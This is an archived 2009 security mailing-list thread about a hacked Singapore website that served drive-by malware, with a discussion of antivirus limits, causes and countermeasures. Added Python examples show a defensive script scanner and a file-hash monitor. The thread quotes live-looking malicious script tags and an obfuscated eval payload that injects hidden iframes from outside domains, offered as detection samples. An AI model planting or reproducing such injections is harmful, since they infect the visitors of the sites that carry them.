[Owasp-singapore] [security-77] viewerschoice.com.sg

Wong Onn Chee ocwong at usa.net
Tue Aug 25 22:10:50 EDT 2009


Hi Aung,

Good feedback.

A further question on the effectiveness of server-side AV.

With reference to the database of infected Chinese sites maintained by
Knowsec, a well-known Chinese company, can server-side AV block those
listed at http://www.scanw.com/blog/archives/date/2009/08 ?

Examples of malicious links:

a) <script src=http://click.cwebgame.com/api.js></script>

b) <script type="text/javascript" language="JavaScript"
src="http://0810%2E6600%2Eorg" id="seraph3script6243"></script>

c) <script language="JavaScript" type="text/javascript"
src="http://c0812.2288.%6Frg" id="seraph4script6785"></script>

d) http://bbs.gamespot.com.cn/include/js/common.js


I am very curious as to how server-side AV can block these effectively
without generating too many false positives.
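As an added illustration (not part of the original message) of one server-side check that handles the encoded src attributes in examples b) and c): the constructed Python scanner below percent-decodes the host of every <script src> on a page and flags any host not on the site's own allowlist, so a signature for 0810.6600.org is not defeated by writing it as 0810%2E6600%2Eorg. TRUSTED_HOSTS and SAMPLE_HTML are assumptions; example d), an injection inside a first-party script file, has no foreign host and is invisible to this check, which is where a file-integrity baseline is needed instead.

```python
"""Flag external <script src> includes in a page after undoing percent-encoding."""
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Assumed allowlist of hosts this site legitimately loads scripts from (constructed).
TRUSTED_HOSTS = {"www.example.sg", "static.example.sg"}

def normalise_host(src):
    """Lower-case host of a script src, decoded first so that an encoded host
    such as 0810%2E6600%2Eorg compares equal to 0810.6600.org."""
    decoded = unquote(src.strip())
    return (urlsplit(decoded).hostname or "").lower()

class ScriptSrcCollector(HTMLParser):
    """Collect the raw src attribute of every <script> start tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)

def find_external_scripts(html, trusted=TRUSTED_HOSTS):
    """Return (host, raw_src) for each include whose host is off the allowlist.
    A src with no host (a first-party file) is local and is skipped."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    hits = []
    for src in parser.srcs:
        host = normalise_host(src)
        if host and host not in trusted:
            hits.append((host, src))
    return hits

# Constructed page: the site's own script plus the injection patterns from the thread.
SAMPLE_HTML = """<html><head>
<script src="http://static.example.sg/app.js"></script>
<script src=http://click.cwebgame.com/api.js></script>
<script type="text/javascript" src="http://0810%2E6600%2Eorg" id="seraph3script6243"></script>
<script language="JavaScript" src="http://c0812.2288.%6Frg" id="seraph4script6785"></script>
<script src="/include/js/common.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for host, src in find_external_scripts(SAMPLE_HTML):
        print(f"external script include: {host:<20} raw src={src}")
```

Run against a crawl of the site's own pages rather than a single file, and review new hosts by hand before blocking, since a legitimate CDN or ad network added by a developer shows up the same way.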


On 08/26/2009 02:02 AM, Aung Khant wrote:
> I've handled this type of incident a couple of times.
>
> Server-side AV software is not useless and it can detect well-known
> injected strings.
> The administrator should schedule the daily update and scan, which
> causes server overhead for hundreds of web sites.
> Also there is a huge need to analyze found malware for false
> positives, which makes server AV software not able to delete/remove
> anything they have found.
> Due to this, you'll never see AV scanners (daily scan) in web server
> environments till a malicious virus spread occurs.
>
> Client-side AV can be effective for well-known injected strings.
>
> But not all AV can detect such. You can check it out by saving the
> following sample as a text file and submitting to virustotal.com
> <http://virustotal.com>.
>
> <script>eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@&
> (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!%
> $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@&
> [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig,
> ""))</script><script>document.write("<if"+''+'ra'+''+"m"+'e
> s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\"
> wid"+''+'th=1
> he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script><script>document.write("<if"+'ra'+"m"+'e
> s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\"
> wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script>
>
> The main reason why JavaScript malware injection is always successful
> at attackers' heart is that
> AV software today lacks a JavaScript emulation engine (as far as I know)
> for malware analysis.
> Most use signatures. Most run at default - lowest heuristic settings.
> I've made a demo movie here:
> http://yehg.net/lab/pr0js/files.php/DefeatingSignature-BasedAVScanners.zip
>
>
> Causes:
> ==========
>
> There are a number of possible causes - security weaknesses on the target.
> Common are insecure server configurations (Application/Web/Database),
> web applications and weak FTP passwords.
>
>
> Counter-measures
> =============
>
> It's all security hardening/patching/monitoring. There is nothing more
> to say.
>
> So, what about against z-day exploits ?
>
> A lot of security companies have launched remote malware monitoring
> services:
> http://www.google.com.sg/search?q=malware+monitoring+service
> A well-known one is http://hackalert.armorize.com/
> A cheap solution is that you can write a script/software to
> periodically search "This site may harm ..." in  Google search term
> with your site.
>
> Again, they all have limitations like AV software. They detect only
> known injections.
> But you'll be notified as soon as injection occurs via periodic scans,
> which gives you time to save from Google Blacklisting.
>
> What about other tricks you can use?
>
> - You can periodically scan files for injection with a clean md5 hash
>   database like what Tripwire does.
> - You can encrypt server-side files (aspx, php, etc.) which contain
>   self-md5 checking that automatically mails/SMSes you if a mismatch is
>   found. For this, you have to use a (commercial) source code encrypter.
>
>
> You can individually feel free to contact & get help from me.
>
>
> On Tue, Aug 25, 2009 at 10:00 PM, Wong Onn Chee <ocwong at usa.net
> <mailto:ocwong at usa.net>> wrote:
>
>     Again, on this topic.
>     This case is similar to the one suffered by websites of UniSIM,
>     Fiat SG and Popular Bookstore.
>
>     I would like to seek feedback from the group on how you will
>     address such a scenario:
>
>     That the web server is infected with malicious Javascript which
>     does not affect the infected web server, but affects all visitors
>     to the site by tricking them to download and install malware which
>     is hosted elsewhere.
>
>     Let's assume the following:
>
>     1) Server-side AV software is useless here as the malware is not
>     on the affected web server.
>     2) Client-side AV software is not effective if the malware could
>     be a zero-day exploit.
>     (The successful infection of UniSIM students in Jan this year
>     shows that client-side AV is not foolproof.)
>
>     There are tons of ways for the malicious Javascript to get into
>     the affected web server.
>     Feel free to propose the possible causes and the relevant
>     counter-measures.
>
>     Let's get creative! :-)
>
>
>
>     On 08/25/2009 10:11 PM, Johnny Wong wrote:
>>     Was there a preceding email? I can't seem to see the initiating
>>     email.
>>
>>     At 09:26 PM 25-08-09, you wrote:
>>>     Was trying to browse to the site ..
>>>
>>>       Any stats on how many Singapore websites are affected by such
>>>     drive-by downloads?
>>>
>>>
>>>     *Safe Browsing*
>>>
>>>     *Diagnostic page for www.viewerschoice.com.sg
>>>     <http://www.viewerschoice.com.sg>*
>>>
>>>     *What is the current listing status for www.viewerschoice.com.sg
>>>     <http://www.viewerschoice.com.sg>?*
>>>
>>>         Site is listed as suspicious - visiting this web site may
>>>         harm your computer.
>>>
>>>         Part of this site was listed for suspicious activity 2
>>>         time(s) over the past 90 days.
>>>
>>>     What happened when Google visited this site?
>>>
>>>         Of the 120 pages we tested on the site over the past 90
>>>         days, 8 page(s) resulted in malicious software being
>>>         downloaded and installed without user consent. The last time
>>>         Google visited this site was on 2009-08-21, and the last
>>>         time suspicious content was found on this site was on
>>>         2009-08-21.
>>>
>>>         Malicious software is hosted on 3 domain(s), including
>>>         a5m.ru/
>>>         <http://www.google.com/safebrowsing/diagnostic?site=a5m.ru/&hl=en>,
>>>         lotbetsite.cn/
>>>         <http://www.google.com/safebrowsing/diagnostic?site=lotbetsite.cn/&hl=en>,
>>>         bigtopleads.cn/
>>>         <http://www.google.com/safebrowsing/diagnostic?site=bigtopleads.cn/&hl=en>.
>>>
>>>         This site was hosted on 2 network(s) including AS4628
>>>         (PACIFIC)
>>>         <http://www.google.com/safebrowsing/diagnostic?site=AS:4628&hl=en>,
>>>         AS15169 (GOOGLE)
>>>         <http://www.google.com/safebrowsing/diagnostic?site=AS:15169&hl=en>.
>>>
>>>     Has this site acted as an intermediary resulting in further
>>>     distribution of malware?
>>>
>>>         Over the past 90 days, www.viewerschoice.com.sg
>>>         <http://www.viewerschoice.com.sg> did not appear to function
>>>         as an intermediary for the infection of any sites.
>>>
>>>     Has this site hosted malware?
>>>
>>>         No, this site has not hosted malicious software over the
>>>         past 90 days.
>>>
>>>     How did this happen?
>>>
>>>         In some cases, third parties can add malicious code to
>>>         legitimate sites, which would cause us to show the warning
>>>         message.
>>>
>>>     Next steps:
>>>
>>>
>>>         * If you are the owner of this web site, you can request a
>>>           review of your site using Google Webmaster Tools
>>>           <http://www.google.com/webmasters/tools/>. More
>>>           information about the review process is available in
>>>           Google's Webmaster Help Center
>>>           <http://www.google.com/support/webmasters/bin/answer.py?answer=45432>.
>>>     --
>>>     Please Note: If you hit "REPLY", your message will be sent to
>>>     everyone on this mailing list (security-77 at meetup.com
>>>     <mailto:security-77 at meetup.com>)
>>>     This message was sent by kianjui (kianjui at gmail.com
>>>     <mailto:kianjui at gmail.com>) from The Singapore Security Meetup
>>>     Group <http://www.meetup.com/SGSecurityMG/>.
>>>     To learn more about kianjui, visit his/her member profile
>>>     <http://www.meetup.com/SGSecurityMG/members/10170594/>
>>>     To unsubscribe or to update your mailing list settings, click
>>>     here <http://www.meetup.com/account/comm/>
>>>
>>>     Meetup Support: support at meetup.com <mailto:support at meetup.com>
>>>     632 Broadway, New York, NY 10012 USA 
>>
>>
>>
>>
>>     --
>>     This message was sent by Johnny Wong (johnnywkm at gmail.com
>>     <mailto:johnnywkm at gmail.com>) from The Singapore Security Meetup
>>     Group <http://www.meetup.com/SGSecurityMG/>.
>
>
>
>
>     --
>     This message was sent by Wong Onn Chee (ocwong at usa.net
>     <mailto:ocwong at usa.net>) from The Singapore Security Meetup Group
>     <http://www.meetup.com/SGSecurityMG/>.
>
>
>
>
> -- 
> Best Regards
> YGN Ethical Hacker Group
> http://yehg.net
>
>
>
>
>
> --
> This message was sent by Aung Khant (aungkhant at yehg.net) from The
> Singapore Security Meetup Group <http://www.meetup.com/SGSecurityMG/>.
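The Tripwire-style hash baseline Aung suggests above, as an added example that is not part of the original thread: digest every file under the web root, re-scan later and report files that were added, modified or removed, which catches an injected line in a first-party file such as common.js that no allowlist of script hosts can see. It uses sha256 in place of the md5 mentioned in the thread, and the web root, its files and the injected script tag are all constructed in a temporary directory.

```python
"""Tripwire-style baseline: hash every file under a web root, re-scan, diff."""
import hashlib
import os
import tempfile

def hash_file(path):
    """sha256 of a file (used here instead of the md5 mentioned in the thread)."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def build_baseline(root):
    """Map each file under root, by path relative to root, to its digest."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = hash_file(full)
    return baseline

def compare(baseline, current):
    """Return sorted lists of added, modified and removed relative paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, modified, removed

def demo():
    """Constructed web root: take a baseline, then simulate an injected script
    tag in index.html and a new file the baseline never saw, and re-scan."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "include", "js"))
        index = os.path.join(root, "index.html")
        with open(index, "w") as f:
            f.write("<html><body>hello</body></html>\n")
        with open(os.path.join(root, "include", "js", "common.js"), "w") as f:
            f.write("function f() {}\n")
        baseline = build_baseline(root)
        with open(index, "a") as f:  # the kind of injection the thread describes
            f.write('<script src="http://0810%2E6600%2Eorg"></script>\n')
        with open(os.path.join(root, "new.php"), "w") as f:
            f.write("<?php // file not present at baseline time ?>\n")
        return compare(baseline, build_baseline(root))

if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added, "modified:", modified, "removed:", removed)
```

Keep the baseline off the web server (or at least read-only to the web server's account), since whoever can write to the web root can otherwise rewrite the baseline together with the pages; re-baseline deliberately after each legitimate deployment.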